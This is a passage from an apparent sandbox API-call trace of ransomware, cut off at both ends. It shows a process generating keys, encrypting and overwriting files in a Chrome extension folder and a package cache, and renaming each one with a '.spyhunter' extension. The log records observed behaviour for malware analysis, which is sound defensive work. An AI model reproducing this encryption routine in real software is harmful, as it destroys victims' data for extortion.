data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_us\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x180 [0133.848] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_US\\messages.json") returned 158 [0133.848] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0133.848] GetProcessHeap () returned 0x2c0000 [0133.848] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0133.848] ReadFile (in: hFile=0x180, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf51c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25cf51c*=0xd7, lpOverlapped=0x0) returned 1 [0133.849] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0xffffff29, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0133.849] WriteFile (in: hFile=0x180, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0xd7, lpNumberOfBytesWritten=0x25cf51c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25cf51c*=0xd7, lpOverlapped=0x0) returned 1 [0133.849] GetProcessHeap () returned 0x2c0000 [0133.849] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0133.850] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0133.850] WriteFile (in: hFile=0x180, lpBuffer=0x25cf55c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf51c, lpOverlapped=0x0 | out: lpBuffer=0x25cf55c*, lpNumberOfBytesWritten=0x25cf51c*=0x4, lpOverlapped=0x0) returned 1 [0133.850] WriteFile (in: hFile=0x180, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf51c, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x25cf51c*=0x30, lpOverlapped=0x0) returned 1 [0133.850] CloseHandle (hObject=0x180) returned 1 [0133.850] GetProcessHeap () returned 0x2c0000 [0133.850] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb3cd0 [0133.850] wnsprintfW (in: pszDest=0x2fb3cd0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_US\\messages.json.spyhunter") returned 168 [0133.850] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_US\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_us\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_US\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_us\\messages.json.spyhunter")) returned 1 [0133.851] GetProcessHeap () returned 0x2c0000 [0133.851] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb3cd0 | out: hHeap=0x2c0000) returned 1 [0133.851] GetProcessHeap () returned 0x2c0000 [0133.851] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0133.851] GetProcessHeap () returned 0x2c0000 [0133.851] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31e308 | out: hHeap=0x2c0000) returned 1 [0133.854] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf558 | out: pbBuffer=0x25cf558) returned 1 [0133.854] GetProcessHeap () returned 0x2c0000 [0133.854] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0133.854] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cf550*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cf550*=0x30) returned 1 [0133.854] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_GB\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_gb\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x180 [0133.854] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_GB\\messages.json") returned 158 [0133.854] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0133.854] GetProcessHeap () returned 0x2c0000 [0133.854] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0133.854] ReadFile (in: hFile=0x180, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf514, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25cf514*=0xd6, lpOverlapped=0x0) returned 1 [0133.856] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0xffffff2a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0133.856] WriteFile (in: hFile=0x180, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0xd6, lpNumberOfBytesWritten=0x25cf514, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25cf514*=0xd6, lpOverlapped=0x0) returned 1 [0133.856] GetProcessHeap () returned 0x2c0000 [0133.856] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0133.856] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0133.856] WriteFile (in: hFile=0x180, lpBuffer=0x25cf554*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf514, lpOverlapped=0x0 | out: lpBuffer=0x25cf554*, lpNumberOfBytesWritten=0x25cf514*=0x4, lpOverlapped=0x0) returned 1 [0133.856] WriteFile (in: hFile=0x180, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf514, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x25cf514*=0x30, lpOverlapped=0x0) returned 1 [0133.856] CloseHandle (hObject=0x180) returned 1 [0133.856] GetProcessHeap () returned 0x2c0000 [0133.856] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb3cd0 [0133.856] wnsprintfW (in: pszDest=0x2fb3cd0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_GB\\messages.json.spyhunter") returned 168 [0133.857] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_GB\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_gb\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_GB\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_gb\\messages.json.spyhunter")) returned 1 [0133.857] GetProcessHeap () returned 0x2c0000 [0133.857] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb3cd0 | out: hHeap=0x2c0000) returned 1 [0133.857] GetProcessHeap () returned 0x2c0000 [0133.857] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0133.857] GetProcessHeap () returned 0x2c0000 [0133.858] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31dff0 | out: hHeap=0x2c0000) returned 1 [0133.859] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf550 | out: pbBuffer=0x25cf550) returned 1 [0133.859] GetProcessHeap () returned 0x2c0000 [0133.859] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0133.859] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cf548*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cf548*=0x30) returned 1 [0133.859] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\el\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\el\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x180 [0133.860] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\el\\messages.json") returned 155 [0133.860] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0133.860] GetProcessHeap () returned 0x2c0000 [0133.860] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0133.860] ReadFile (in: hFile=0x180, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf50c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25cf50c*=0x112, lpOverlapped=0x0) returned 1 [0133.882] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0xfffffeee, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0133.883] WriteFile (in: hFile=0x180, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x112, lpNumberOfBytesWritten=0x25cf50c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25cf50c*=0x112, lpOverlapped=0x0) returned 1 [0133.883] GetProcessHeap () returned 0x2c0000 [0133.883] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0133.883] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0133.883] WriteFile (in: hFile=0x180, lpBuffer=0x25cf54c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf50c, lpOverlapped=0x0 | out: lpBuffer=0x25cf54c*, lpNumberOfBytesWritten=0x25cf50c*=0x4, lpOverlapped=0x0) returned 1 [0133.883] WriteFile (in: hFile=0x180, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf50c, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x25cf50c*=0x30, lpOverlapped=0x0) returned 1 [0133.883] CloseHandle (hObject=0x180) returned 1 [0133.883] GetProcessHeap () returned 0x2c0000 [0133.883] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb3cd0 [0133.884] wnsprintfW (in: pszDest=0x2fb3cd0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\el\\messages.json.spyhunter") returned 165 [0133.884] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\el\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\el\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\el\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\el\\messages.json.spyhunter")) returned 1 [0133.884] GetProcessHeap () returned 0x2c0000 [0133.884] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb3cd0 | out: hHeap=0x2c0000) returned 1 [0133.884] GetProcessHeap () returned 0x2c0000 [0133.885] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0133.885] GetProcessHeap () returned 0x2c0000 [0133.885] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e18088 | out: hHeap=0x2c0000) returned 1 [0133.916] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf548 | out: pbBuffer=0x25cf548) returned 1 [0133.916] GetProcessHeap () returned 0x2c0000 [0133.917] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0133.917] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x25cf540*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x25cf540*=0x30) returned 1 [0133.917] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{cf2bea3c-26ea-32f8-aa9b-331f7e34ba97}v11.0.61030\\packages\\vcruntimeminimum_amd64\\cab1.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x184 [0134.046] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\cab1.cab") returned 123 [0134.046] StrStrW (lpFirst="cab1.cab", lpSrch=".txt") returned 0x0 [0134.046] GetProcessHeap () returned 0x2c0000 [0134.046] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0134.046] ReadFile (in: hFile=0x184, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf504, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25cf504*=0x2800, lpOverlapped=0x0) returned 1 [0134.047] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0134.048] WriteFile (in: hFile=0x184, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cf504, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25cf504*=0x2800, lpOverlapped=0x0) returned 1 [0134.049] GetProcessHeap () returned 0x2c0000 [0134.049] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0134.049] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.049] WriteFile (in: hFile=0x184, lpBuffer=0x25cf544*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf504, lpOverlapped=0x0 | out: lpBuffer=0x25cf544*, lpNumberOfBytesWritten=0x25cf504*=0x4, lpOverlapped=0x0) returned 1 [0134.050] WriteFile (in: hFile=0x184, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf504, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x25cf504*=0x30, lpOverlapped=0x0) returned 1 [0134.050] CloseHandle (hObject=0x184) returned 1 [0134.050] GetProcessHeap () returned 0x2c0000 [0134.050] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fa3c88 [0134.050] wnsprintfW (in: pszDest=0x2fa3c88, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\cab1.cab.spyhunter") returned 133 [0134.050] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{cf2bea3c-26ea-32f8-aa9b-331f7e34ba97}v11.0.61030\\packages\\vcruntimeminimum_amd64\\cab1.cab"), lpNewFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\cab1.cab.spyhunter" (normalized: "c:\\programdata\\package cache\\{cf2bea3c-26ea-32f8-aa9b-331f7e34ba97}v11.0.61030\\packages\\vcruntimeminimum_amd64\\cab1.cab.spyhunter")) returned 1 [0134.051] GetProcessHeap () returned 0x2c0000 [0134.051] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fa3c88 | out: hHeap=0x2c0000) returned 1 [0134.051] GetProcessHeap () returned 0x2c0000 [0134.051] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0134.051] GetProcessHeap () returned 0x2c0000 [0134.051] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f05dc8 | out: hHeap=0x2c0000) returned 1 [0134.051] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf548 | out: pbBuffer=0x25cf548) returned 1 [0134.051] GetProcessHeap () returned 0x2c0000 [0134.051] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0134.051] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x25cf540*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x25cf540*=0x30) returned 1 [0134.051] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata\\computed_hashes.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata\\computed_hashes.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x184 [0134.052] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata\\computed_hashes.json") returned 160 [0134.052] StrStrW (lpFirst="computed_hashes.json", lpSrch=".txt") returned 0x0 [0134.052] GetProcessHeap () returned 0x2c0000 [0134.052] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0134.052] ReadFile (in: hFile=0x184, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf504, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25cf504*=0x160, lpOverlapped=0x0) returned 1 [0134.053] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0xfffffea0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0134.053] WriteFile (in: hFile=0x184, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x160, lpNumberOfBytesWritten=0x25cf504, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25cf504*=0x160, lpOverlapped=0x0) returned 1 [0134.053] GetProcessHeap () returned 0x2c0000 [0134.053] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0134.053] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.053] WriteFile (in: hFile=0x184, lpBuffer=0x25cf544*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf504, lpOverlapped=0x0 | out: lpBuffer=0x25cf544*, lpNumberOfBytesWritten=0x25cf504*=0x4, lpOverlapped=0x0) returned 1 [0134.053] WriteFile (in: hFile=0x184, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf504, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x25cf504*=0x30, lpOverlapped=0x0) returned 1 [0134.053] CloseHandle (hObject=0x184) returned 1 [0134.054] GetProcessHeap () returned 0x2c0000 [0134.054] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fa3c88 [0134.054] wnsprintfW (in: pszDest=0x2fa3c88, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata\\computed_hashes.json.spyhunter") returned 170 [0134.054] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata\\computed_hashes.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata\\computed_hashes.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata\\computed_hashes.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata\\computed_hashes.json.spyhunter")) returned 1 [0134.054] GetProcessHeap () returned 0x2c0000 [0134.054] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fa3c88 | out: hHeap=0x2c0000) returned 1 [0134.054] GetProcessHeap () returned 0x2c0000 [0134.054] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0134.054] GetProcessHeap () returned 0x2c0000 [0134.054] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fc94b8 | out: hHeap=0x2c0000) returned 1 [0134.056] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf538 | out: pbBuffer=0x25cf538) returned 1 [0134.058] GetProcessHeap () returned 0x2c0000 [0134.059] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0134.059] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x25cf530*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x25cf530*=0x30) returned 1 [0134.059] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_TW\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_tw\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x184 [0134.059] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_TW\\messages.json") returned 158 [0134.059] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0134.059] GetProcessHeap () returned 0x2c0000 [0134.059] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0134.059] ReadFile (in: hFile=0x184, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf4f4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25cf4f4*=0xd1, lpOverlapped=0x0) returned 1 [0134.061] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0xffffff2f, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0134.061] WriteFile (in: hFile=0x184, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0xd1, lpNumberOfBytesWritten=0x25cf4f4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25cf4f4*=0xd1, lpOverlapped=0x0) returned 1 [0134.061] GetProcessHeap () returned 0x2c0000 [0134.061] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0134.061] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: 